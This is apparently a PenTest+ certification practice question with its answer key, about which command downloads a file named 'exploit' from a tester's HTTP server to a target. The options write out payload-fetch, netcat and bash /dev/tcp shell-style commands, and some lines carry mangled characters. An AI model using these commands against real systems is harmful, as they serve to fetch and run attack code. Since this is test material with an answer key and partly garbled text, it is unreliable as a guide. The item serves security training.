CompTIA PenTest+ (PT1-002) — Question 85

A penetration tester ran the following command on a staging server: python `"m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

Answer options

• A. nc 10.10.51.50 9891 < exploit
• B. powershell ג€"exec bypass ג€"f \\10.10.51.50\9891
• C. bash ג€"i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
• D. wget 10.10.51.50:9891/exploit

Correct answer: D

Explanation

The correct answer is D because wget is a command-line utility that allows users to download files from the web, making it suitable for retrieving the exploit file hosted on the SimpleHTTPServer at the specified address. Option A incorrectly attempts to send the exploit file to the server instead of downloading it, while options B and C are not valid for downloading files from a web server.